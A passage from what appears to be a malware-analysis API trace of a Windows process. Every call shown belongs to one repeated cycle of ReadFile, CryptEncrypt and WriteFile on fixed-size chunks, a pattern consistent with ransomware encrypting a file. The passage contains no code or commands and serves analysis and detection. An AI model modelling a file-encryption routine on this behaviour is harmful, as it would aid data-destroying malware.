pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.299] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.299] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.299] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.300] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.300] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.300] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.300] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.300] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.300] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.300] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.300] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.300] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.300] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.300] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.300] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.300] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.301] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.301] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.301] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.301] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.301] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.301] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.301] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.301] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.301] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.301] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.301] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.302] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.302] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.302] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.302] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.302] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.302] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.302] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.302] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.302] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.302] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.302] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.302] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.302] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.303] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.303] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.303] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.303] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.303] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.303] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.303] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.303] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.303] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.303] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.303] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.303] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.304] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.304] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.304] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.304] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.304] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.304] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.304] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.304] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.304] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.304] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.304] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.304] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.304] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.305] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.305] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.305] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.305] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.305] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.305] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.305] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.305] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.306] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.306] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.306] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.306] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.306] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.306] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.306] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.306] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.306] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.306] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.306] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.306] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.307] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.307] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.307] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.307] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.307] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.307] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.307] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.307] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.307] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.307] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.307] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.307] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, 